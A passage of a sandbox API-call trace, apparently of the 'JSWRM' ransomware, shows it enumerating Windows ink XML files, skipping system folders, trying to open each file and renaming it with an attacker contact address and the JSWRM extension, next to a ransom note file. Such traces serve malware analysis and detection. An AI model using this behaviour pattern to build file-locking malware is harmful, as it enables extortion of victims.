hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0068.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.096] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0068.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0068.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0068.097] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x40e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp.xml", cAlternateFileName="")) returned 1 [0068.097] lstrcmpiW (lpString1="ja-jp.xml", lpString2=".") returned 1 [0068.097] lstrcmpiW (lpString1="ja-jp.xml", lpString2="..") returned 1 [0068.097] lstrcmpiW (lpString1="ja-jp.xml", lpString2="...") returned 1 [0068.097] lstrcmpiW (lpString1="ja-jp.xml", lpString2="windows") returned -1 [0068.097] lstrcmpiW (lpString1="ja-jp.xml", lpString2="recovery") returned -1 [0068.097] lstrcmpiW (lpString1="ja-jp.xml", lpString2="perflogs") returned -1 [0068.097] lstrcmpiW (lpString1="ja-jp.xml", lpString2="documents and settings") returned 1 [0068.097] lstrcmpiW (lpString1="ja-jp.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.097] lstrcmpiW (lpString1="ja-jp.xml", lpString2="system volume information") returned -1 [0068.097] lstrcmpiW (lpString1="ja-jp.xml", lpString2="msocache") returned -1 [0068.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ja-jp.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ja-jp.xml", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ja-jp.xml", lpUsedDefaultChar=0x0) returned 9 [0068.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ja-jp.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ja-jp.xml", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ja-jp.xml", lpUsedDefaultChar=0x0) returned 9 [0068.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0068.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.097] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.097] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=10092520312917832) returned 0 [0068.097] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.097] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.097] CloseHandle (hObject=0xffffffff) returned 1 [0068.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0068.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0068.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0068.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0068.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0068.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.098] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0068.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.098] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3cc05b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f3cc05b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f3cc05b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.098] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0068.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.099] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3af9, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-kr.xml", cAlternateFileName="")) returned 1 [0068.099] lstrcmpiW (lpString1="ko-kr.xml", lpString2=".") returned 1 [0068.099] lstrcmpiW (lpString1="ko-kr.xml", lpString2="..") returned 1 [0068.099] lstrcmpiW (lpString1="ko-kr.xml", lpString2="...") returned 1 [0068.099] lstrcmpiW (lpString1="ko-kr.xml", lpString2="windows") returned -1 [0068.099] lstrcmpiW (lpString1="ko-kr.xml", lpString2="recovery") returned -1 [0068.099] lstrcmpiW (lpString1="ko-kr.xml", lpString2="perflogs") returned -1 [0068.099] lstrcmpiW (lpString1="ko-kr.xml", lpString2="documents and settings") returned 1 [0068.099] lstrcmpiW (lpString1="ko-kr.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.099] lstrcmpiW (lpString1="ko-kr.xml", lpString2="system volume information") returned -1 [0068.099] lstrcmpiW (lpString1="ko-kr.xml", lpString2="msocache") returned -1 [0068.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ko-kr.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ko-kr.xml", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ko-kr.xml", lpUsedDefaultChar=0x0) returned 9 [0068.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ko-kr.xml", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ko-kr.xml", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ko-kr.xml", lpUsedDefaultChar=0x0) returned 9 [0068.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0068.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0068.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.100] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=10085304767860384) returned 0 [0068.100] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.100] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.100] CloseHandle (hObject=0xffffffff) returned 1 [0068.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0068.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0068.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0068.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0068.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0068.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.101] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0068.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.101] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x264b, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-changjei.xml", cAlternateFileName="")) returned 1 [0068.101] lstrcmpiW (lpString1="zh-changjei.xml", lpString2=".") returned 1 [0068.101] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="..") returned 1 [0068.101] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="...") returned 1 [0068.101] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="windows") returned 1 [0068.101] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="recovery") returned 1 [0068.101] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="perflogs") returned 1 [0068.101] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="documents and settings") returned 1 [0068.101] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.101] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="system volume information") returned 1 [0068.101] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="msocache") returned 1 [0068.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-changjei.xml", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-changjei.xml", cchWideChar=15, lpMultiByteStr=0x345e870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zh-changjei.xml", lpUsedDefaultChar=0x0) returned 15 [0068.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-changjei.xml", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-changjei.xml", cchWideChar=15, lpMultiByteStr=0x345e840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zh-changjei.xml", lpUsedDefaultChar=0x0) returned 15 [0068.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0068.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0068.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0068.101] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.102] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9956490108692112) returned 0 [0068.102] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.102] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.102] CloseHandle (hObject=0xffffffff) returned 1 [0068.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0068.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 